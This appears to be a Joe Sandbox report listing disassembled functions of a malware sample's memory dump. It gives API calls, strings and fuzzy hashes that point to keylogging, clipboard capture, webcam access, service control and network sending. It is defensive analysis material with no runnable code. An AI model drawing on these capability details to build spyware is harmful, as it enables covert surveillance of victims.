Function 00444B3D Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 00444B69
__cftoe.LIBCMT ref: 00444B9B

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
Opcode Fuzzy Hash: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D

Function 024B51A4 Relevance: 9.1, APIs: 6, Instructions: 143COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024B5214
_free.LIBCMT ref: 024B522A
_free.LIBCMT ref: 024B523B
_free.LIBCMT ref: 024B524C
_free.LIBCMT ref: 024B5263
GetCPInfo.KERNEL32(?,?), ref: 024B52AB

Part of subcall function 024C1E82: _free.LIBCMT ref: 024C1EED

_free.LIBCMT ref: 024B54C5
_free.LIBCMT ref: 024B54CD
_free.LIBCMT ref: 024B54D5
_free.LIBCMT ref: 024B54DD
_free.LIBCMT ref: 024B54EB

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 15c1efeab650589001bcb3423f25e61575b515edc70c88f8593ca702e347ec5e
Instruction ID: dd47eb53de2a52fe82e0a67af5062250e59cba3933d6f00a4c256a17d30bc2d2
Opcode Fuzzy Hash: 15c1efeab650589001bcb3423f25e61575b515edc70c88f8593ca702e347ec5e
Instruction Fuzzy Hash: B9512EB0900305AEEB229F6AC881BEFBABDFF48704F44452EE599B6241D77598458F31

Function 00446159 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00446261
__freea.LIBCMT ref: 0044630B
__freea.LIBCMT ref: 00446329

Strings

am/pm, xrefs: 0044638C
a/p, xrefs: 004463F0

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16
String ID: a/p$am/pm
API String ID: 3509577899-3206640213
Opcode ID: 1c25dcc0d130d21bcb21cb36e322773b61d5ee2df9780b69dabcd7deded9a1aa
Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
Opcode Fuzzy Hash: 1c25dcc0d130d21bcb21cb36e322773b61d5ee2df9780b69dabcd7deded9a1aa
Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B

Function 0247404E Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 135sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 024740F1

Part of subcall function 02474234: __EH_prolog.LIBCMT ref: 02474239

Strings

FreeFrame, xrefs: 024741DD
P>G, xrefs: 02474213
OpenCamera, xrefs: 024741AF
CloseCamera, xrefs: 024741BB
GetFrame, xrefs: 024741CC

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: H_prologSleep
String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
API String ID: 3469354165-462540288
Opcode ID: 91ddb64871bfde904ede40e3b9f088facac6f709450aecbaf3ccac608dc9d27d
Instruction ID: fd5711683e7ddaa81ce0f393d6591a5c81dd1594e65fcb81649f9895f91344e1
Opcode Fuzzy Hash: 91ddb64871bfde904ede40e3b9f088facac6f709450aecbaf3ccac608dc9d27d
Instruction Fuzzy Hash: ED41C431A4424057CB15FB7998186ED37A3AB51740F00452FEC2A9B7E4EF749A4ACF8A

Function 02476E50 Relevance: 9.1, APIs: 6, Instructions: 97fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 02476E9F
WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0), ref: 02476EE7

Part of subcall function 024746CF: send.WS2_32(?,00000000,00000000,00000000), ref: 02474764

CloseHandle.KERNEL32(00000000), ref: 02476F27
MoveFileW.KERNEL32(00000000,00000000), ref: 02476F44
CloseHandle.KERNEL32(00000000,00000057,?,00000008), ref: 02476F6F
DeleteFileW.KERNEL32(00000000), ref: 02476F7F

Part of subcall function 024747C2: WaitForSingleObject.KERNEL32(?,000000FF,?,?,02474875,00000000,?,?), ref: 024747D1
Part of subcall function 024747C2: SetEvent.KERNEL32(?,?,?,02474875,00000000,?,?), ref: 024747EF

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
String ID:
API String ID: 1303771098-0
Opcode ID: 7cdf14121b30b943d831dc041884720089c76492bcd48607f22f732c73577ab1
Instruction ID: 9978cab42147187bed2e545984f97452f3662541036fd9fa6360e5e255f7c2c5
Opcode Fuzzy Hash: 7cdf14121b30b943d831dc041884720089c76492bcd48607f22f732c73577ab1
Instruction Fuzzy Hash: 84316D715083459FC210EF21DD84DEFB7AEFB84751F00492EF996A2150DB74AA48CFA2

Function 00419DEC Relevance: 9.1, APIs: 6, Instructions: 66serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ChangeConfigManager
String ID:
API String ID: 493672254-0
Opcode ID: 4b57f08884289702e919fa495e42c77ed9934a7abc3a504554b536141b6f0a6f
Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
Opcode Fuzzy Hash: 4b57f08884289702e919fa495e42c77ed9934a7abc3a504554b536141b6f0a6f
Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9

Function 02489EEC Relevance: 9.1, APIs: 6, Instructions: 66serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000011), ref: 02489EFB
OpenServiceW.ADVAPI32(00000000,00000000,000F003F), ref: 02489F12
CloseServiceHandle.ADVAPI32(00000000), ref: 02489F1F
ControlService.ADVAPI32(00000000,00000001,?), ref: 02489F2E

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Service$Open$CloseControlHandleManager
String ID:
API String ID: 1243734080-0
Opcode ID: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
Instruction ID: 12873d7a49e50780e56f6e40f7331c927585651e8d39293395bde3bfb283aa22
Opcode Fuzzy Hash: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
Instruction Fuzzy Hash: 0C11A932545218BFD711AB64EC84EFF3BBCDB45AA2B000036FA06922D1DB64CD46DAB1

Function 00437E06 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
Opcode Fuzzy Hash: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C

Function 024A806D Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,024A8064,024A7A18), ref: 024A807B
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 024A8089
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 024A80A2
SetLastError.KERNEL32(00000000,?,024A8064,024A7A18), ref: 024A80F4

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
Instruction ID: a5bbaf8ed61a48820ea8f90f678908ac33a6a26917eaef2a942f106b04c50e61
Opcode Fuzzy Hash: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
Instruction Fuzzy Hash: 6C01D83211D7215EE7251775BCA97572695FB21775B21033FF618852E0EF1148419944

Function 00446EBF Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
_free.LIBCMT ref: 00446EF6
_free.LIBCMT ref: 00446F1E
SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
_abort.LIBCMT ref: 00446F3D

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F

Function 024B7126 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,024AE4C7,024A9583,024AE4C7,00475B70,?,024ABBBC,FF8BC35D,00475B70,00473EE8), ref: 024B712A
_free.LIBCMT ref: 024B715D
_free.LIBCMT ref: 024B7185
SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 024B7192
SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 024B719E
_abort.LIBCMT ref: 024B71A4

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
Instruction ID: 62a9ff62bb8c8756d71d0cb3e2565f4887a40d41a96d7ed077f92a3688c2fba2
Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
Instruction Fuzzy Hash: 68F0813714471066D613233A6C08EEF666A9FC1BA2F25012BF568A2399EF2188429935

Function 00419C20 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 517b822d22458437527d1e9cbdfc97266076cea8084bb5cfd57edb9da03c8458
Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
Opcode Fuzzy Hash: 517b822d22458437527d1e9cbdfc97266076cea8084bb5cfd57edb9da03c8458
Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5

Function 00419D22 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: fc71d5791bc2ab0d399731afbbc9991a405c244f030a4858923af4d6f7d4f6a8
Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
Opcode Fuzzy Hash: fc71d5791bc2ab0d399731afbbc9991a405c244f030a4858923af4d6f7d4f6a8
Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9

Function 00419D87 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 11497d9f4578c05281f2844bb399801e1d7eb3a7c1e44722447e262b7b9a69a9
Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
Opcode Fuzzy Hash: 11497d9f4578c05281f2844bb399801e1d7eb3a7c1e44722447e262b7b9a69a9
Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8

Function 004129AA Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 173registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED

Strings

[regsplt], xrefs: 00412B85
DG, xrefs: 00412B2F

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Enum$InfoQueryValue
String ID: [regsplt]$DG
API String ID: 3554306468-1089238109
Opcode ID: c7bc3e18f4518da67f04f3b7a5a0c35a58c7874d041d3d005197038845e86310
Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
Opcode Fuzzy Hash: c7bc3e18f4518da67f04f3b7a5a0c35a58c7874d041d3d005197038845e86310
Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A

Function 0247C8D4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

Part of subcall function 02481900: TerminateProcess.KERNEL32(00000000,?,0247C8E4), ref: 02481910
Part of subcall function 02481900: WaitForSingleObject.KERNEL32(000000FF,?,0247C8E4), ref: 02481923

Part of subcall function 024828C4: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 024828E0
Part of subcall function 024828C4: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 024828F9
Part of subcall function 024828C4: RegCloseKey.ADVAPI32(?), ref: 02482904

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0247C92E
ShellExecuteW.SHELL32(00000000,0046559C,00000000,00465900,00465900,00000000), ref: 0247CA8D
ExitProcess.KERNEL32 ref: 0247CA99

Strings

exepath, xrefs: 0247C906
@CG, xrefs: 0247C8E4

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
String ID: @CG$exepath
API String ID: 1913171305-1253070338
Opcode ID: 7fefd4fcae7e0ef6d55ce9d204f1d3822a483be89a92adb2579d4a357fc0ee6e
Instruction ID: 126c01d073a512d0ad4814dde3b45cbc5ce23f10486fd883b917af7cde27fff4
Opcode Fuzzy Hash: 7fefd4fcae7e0ef6d55ce9d204f1d3822a483be89a92adb2579d4a357fc0ee6e
Instruction Fuzzy Hash: A64174329101585ACB24FB62DC50EFF777BAF50700F10016FE926A3295EFA45E86CEA5

Function 0248409E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 109libraryloaderCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 024840ED
LoadLibraryA.KERNEL32(?), ref: 0248412F
LoadLibraryA.KERNEL32(?), ref: 0248418E
GetProcAddress.KERNEL32(00000000,?), ref: 024841B6

Strings

g<A, xrefs: 024840C2

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressDirectoryProcSystem
String ID: g<A
API String ID: 4217395396-3237022798
Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
Instruction ID: 66511cbd9a754285dd449dbce664c93dab9e543b95d3eb41bc583e59aefc9cdf
Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
Instruction Fuzzy Hash: 7D31E9B19063166BD321FB24DC48EAFB7DCEF45794F050A2AE854A3200E774D6418BEA

Function 0040AE58 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 00433519: RtlEnterCriticalSection.KERNEL32(00470D18,008E54D8,00475BF0,00473D54,0040179E,00475BF0,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00433524
Part of subcall function 00433519: RtlLeaveCriticalSection.KERNEL32(00470D18,?,00000000,00401913), ref: 00433561

Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB

__Init_thread_footer.LIBCMT ref: 0040AEA7

Part of subcall function 004334CF: RtlEnterCriticalSection.KERNEL32(00470D18,00475BF0,00473D54,004017C1,00475BF0,00000000,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 004334D9
Part of subcall function 004334CF: RtlLeaveCriticalSection.KERNEL32(00470D18,?,00000000,00401913), ref: 0043350C

Strings

[Text copied to clipboard], xrefs: 0040AEF6
,]G, xrefs: 0040AE80
[End of clipboard], xrefs: 0040AEE9
0]G, xrefs: 0040AE70

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
API String ID: 2974294136-753205382
Opcode ID: ed19f85325dd06eadd096313144365163ec14fa91bc4e34bbfaa036fab6e7a2e
Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
Opcode Fuzzy Hash: ed19f85325dd06eadd096313144365163ec14fa91bc4e34bbfaa036fab6e7a2e
Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D

Function 0040A876 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
wsprintfW.USER32 ref: 0040A905

Part of subcall function 00409D58: SetEvent.KERNEL32(00000000,?,00000000,0040A91C,00000000), ref: 00409D84

Strings

], xrefs: 0040A892
Offline Keylogger Started, xrefs: 0040A87D
[%04i/%02i/%02i %02i:%02i:%02i , xrefs: 0040A88D

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: EventLocalTimewsprintf
String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
API String ID: 1497725170-248792730
Opcode ID: b15d224654da5c6707bfa8dfe101a26c0bb6d293903a2dc0f18e877db2d38345
Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
Opcode Fuzzy Hash: b15d224654da5c6707bfa8dfe101a26c0bb6d293903a2dc0f18e877db2d38345
Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9

Function 00409D97 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10

Strings

`AG, xrefs: 00409DC2

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

